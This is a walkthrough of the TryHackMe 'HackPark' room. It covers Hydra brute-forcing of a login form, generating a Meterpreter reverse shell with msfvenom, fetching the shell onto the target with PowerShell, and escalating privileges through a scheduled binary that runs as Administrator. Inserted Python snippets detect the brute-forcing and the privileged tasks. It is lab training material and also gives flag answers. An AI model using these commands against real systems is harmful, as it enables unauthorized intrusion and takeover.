TryHackMe Room Hackpark
@ Animesh Roy | Saturday, Jun 19, 2021 | 5 minutes read | Update at Saturday, Jun 19, 2021


Room link : HackPark

task 01: Deploy the vulnerable Windows machine

This room covers brute-forcing an account's credentials, handling public exploits, using the Metasploit framework, and privilege escalation on Windows.


1. Deploy the machine and access its web server.
2. What's the name of the clown displayed on the homepage?
Download the image and do a reverse image search; the answer is PENNYWISE.

task 02: Using Hydra to brute-force a login


1. Find the directory using gobuster

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/06/19 20:08:03 Starting gobuster in directory enumeration mode

/account              (Status: 301) [Size: 152] [-->]
/admin                (Status: 302) [Size: 173] [-->]


We found the /admin directory here; let's check it out.


Flag 2.1

1. What request type is the Windows website login form using?

Flag 2.2

Hydra bruteforce command

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=eRnxFX0KeP0JSP3NUgJuQNgMv0s2Vbi3LgmkZ1b13u5XVzxoWRsgjuZ1i9zBwladu1Sn2olX%2BOFslf3MYIG%2BlcCFhPNOo39g9aaorqmfZ93BBwYH%2BU66nHfBoPd6mu2nKWfs4%2FFZacIS%2Ff1LUkpUlG29J6pqWWdWu1XGrlgHl4lNicNd&__EVENTVALIDATION=fLvo1twKPtwoRdRfJPlthZ9VW0RmhUAGor8gmqwlkM3r%2BiRaQAOP97BUNWjE%2BbVSNzZnye1kEuI2S72bUGOZqDPu0E7weYfJPUYT6xHHJ0%2F8wMA8ovjF9GRdvpIR0cHRYE%2BLAC2eUQ5%2ByMBbSzIv92ZRoxDToB5I4z4eiaYaGYKRGxvj&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
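How the Hydra run above looks from the server side, as an added example that is not part of the original write-up: a sliding-window count of failed POSTs to the login form per client IP. It assumes IIS W3C logging with the fields shown, that a failed login re-renders the form with status 200 while a successful one redirects with 302, and an arbitrary window and threshold; the sample log is constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"  # login form from the Hydra command, lower-cased
WINDOW = timedelta(seconds=60)      # assumed detection window
THRESHOLD = 5                       # assumed tolerated failures per window

# Constructed sample log (IIS W3C extended format), not captured from the room.
SAMPLE_LOG = "\n".join(
    ["#Fields: date time cs-method cs-uri-stem c-ip sc-status",
     "2021-06-19 14:39:50 POST /Account/login.aspx 10.0.0.7 200",
     "2021-06-19 14:39:58 POST /Account/login.aspx 10.0.0.7 302"]
    + [f"2021-06-19 14:40:{s:02d} POST /Account/login.aspx 10.0.0.5 200"
       for s in range(0, 40, 2)]
    + ["2021-06-19 14:40:41 POST /Account/login.aspx 10.0.0.5 302"]
)

def parse_w3c(text):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def detect_bruteforce(text, window=WINDOW, threshold=THRESHOLD):
    """Return {client_ip: peak failures in one window} for IPs above threshold."""
    recent = defaultdict(deque)
    peaks = {}
    for row in parse_w3c(text):
        if row["cs-method"] != "POST" or row["cs-uri-stem"].lower() != LOGIN_PATH:
            continue
        if row["sc-status"] != "200":  # assumption: 302 means the login succeeded
            continue
        ts = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        q = recent[row["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:      # drop failures older than the window
            q.popleft()
        if len(q) > threshold:
            peaks[row["c-ip"]] = max(peaks.get(row["c-ip"], 0), len(q))
    return peaks

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The single mistyped password from 10.0.0.7 stays under the threshold, while the 20 failures in 40 seconds from 10.0.0.5 are reported.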


task 03: Compromise the machine

Exploit-Database is a CVE (Common Vulnerabilities and Exposures) archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. It is owned by Offensive Security (who are responsible for OSCP and Kali).

Exploit: Exploit-DB

Flag 3.1

Now you have logged into the website, are you able to identify the version of the BlogEngine?


add CVE- then the exploit ID

Flag 3.2

What is the CVE?


Flag 3.3

Who is the webserver running as?

Get the reverse connection working as described on the exploit page; once that is done, run the whoami command to get the answer.


task 04: Windows Privilege Escalation

  • generate the shell
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=1337 -f exe -o supershell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: supershell.exe
  • msf.rc conf
└─$ cat www/msf.rc 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport 1337
set exitonsession false
exploit -j 
  • run the listener
└─$ msfconsole -q -r msf.rc 
  • run the webserver (linux)
# Change to the directory where your exe file is located
sudo python3 -m http.server 80 
#my exe is supershell.exe.exe
  • download shell on target
# download 
c:\Windows\Temp>powershell -c "Invoke-WebRequest -Uri '' -OutFile 'shell.exe'"
  • Msfconsole
msf6 exploit(multi/handler) > [*] Sending stage (200262 bytes) to
msf6 exploit(multi/handler) > [*] Meterpreter session 1 opened ( -> at 2021-06-19 21:01:05 +0530
  • get root


Upload the shell to C:\Program Files (x86)\SystemScheduler and rename shell.exe to Message.exe.

Flag 4.1

Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually! No answer required.

Flag 4.2

What is the OS version of this windows machine?

Run sysinfo in the meterpreter shell.


Flag 4.3

What is the name of the abnormal service running?

WScheduler.exe, named WindowsScheduler

Flag 4.4

What is the name of the binary you’re supposed to exploit?


  • find the log in C:\Program Files (x86)\SystemScheduler\Events
meterpreter > ls
Listing: C:\Program Files (x86)\SystemScheduler\Events

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1926   fil   2019-08-05 03:35:19 +0530  20198415519.INI
100666/rw-rw-rw-  31219  fil   2019-08-05 03:36:01 +0530  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-03 03:20:12 +0530  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-06-19 19:45:08 +0530  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-06-19 19:44:39 +0530  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-06-19 19:45:08 +0530  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 17:06:53 +0530  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-06-19 19:44:39 +0530  service.flg
  • read the log
06/19/21 08:52:33,Process Ended. PID:1852,ExitCode:4,Message.exe (Administrator)
06/19/21 08:53:01,Event Started Ok, (Administrator)
06/19/21 08:53:33,Process Ended. PID:1688,ExitCode:4,Message.exe (Administrator)
06/19/21 08:54:05,Event Started Ok, (Administrator)
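The same log read programmatically, as an added example that is not part of the original write-up: it parses the "Process Ended" entries and reports which image the scheduler runs repeatedly, under which account, and how often. The line format is inferred from the four lines above; the function name and the `min_runs` parameter are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# The four log lines shown in the write-up above.
LOG = """\
06/19/21 08:52:33,Process Ended. PID:1852,ExitCode:4,Message.exe (Administrator)
06/19/21 08:53:01,Event Started Ok, (Administrator)
06/19/21 08:53:33,Process Ended. PID:1688,ExitCode:4,Message.exe (Administrator)
06/19/21 08:54:05,Event Started Ok, (Administrator)
"""

# Format inferred from the lines above: timestamp, event text, PID, exit code,
# image name, then the account in parentheses.
ENDED = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d \d\d:\d\d:\d\d),Process Ended\. "
    r"PID:(?P<pid>\d+),ExitCode:(?P<code>-?\d+),"
    r"(?P<image>.+?) \((?P<account>[^)]+)\)$"
)

def recurring_tasks(log_text, min_runs=2):
    """Return [(image, account, runs, gaps_in_seconds)] for images run repeatedly."""
    runs = defaultdict(list)
    for line in log_text.splitlines():
        m = ENDED.match(line.strip())
        if m:  # "Event Started Ok" lines carry no image name and are skipped
            ts = datetime.strptime(m["ts"], "%m/%d/%y %H:%M:%S")
            runs[(m["image"], m["account"])].append(ts)
    report = []
    for (image, account), stamps in sorted(runs.items()):
        if len(stamps) >= min_runs:
            stamps.sort()
            gaps = [int((b - a).total_seconds())
                    for a, b in zip(stamps, stamps[1:])]
            report.append((image, account, len(stamps), gaps))
    return report

if __name__ == "__main__":
    for image, account, count, gaps in recurring_tasks(LOG):
        print(f"{image} runs as {account}: {count} runs, gaps {gaps} s")
```

An image that recurs under a privileged account is the one whose directory permissions matter: if ordinary users can write to that directory (check with icacls), restrict it to administrators.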

Flag 4.5

What is the user flag (on Jeffs Desktop)?

We already have an administrator shell with which to view the flags.


What is the root flag?


Task 05: Privilege Escalation Without Metasploit

In this task we will escalate our privileges without the use of meterpreter/metasploit! Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell. Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.


Flag 5.1

Now we can generate a more stable shell using msfvenom instead of using a meterpreter. This time let's set our payload to windows/shell_reverse_tcp.

  • used this website to generate the shellcode.

  • msf.rc

    #saved as shell.rc
    use exploit/multi/handler
    set payload windows/x64/shell_reverse_tcp 
    set lhost
    set lport 1337
    set exitonsession false
    exploit -j
  • run listener msfconsole -r shell.rc

  • upload the file powershell -c "Invoke-WebRequest -Uri '' -OutFile 'rev.exe'"

  • run the file

Flag 5.2

Tip: It’s common to find C:\Windows\Temp is world writable!

Flag 5.3

WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!

Using winPeas, what was the Original Install time? (This is date and time) 8/3/2019, 10:43:23 AM

A systeminfo.exe command gives it away.
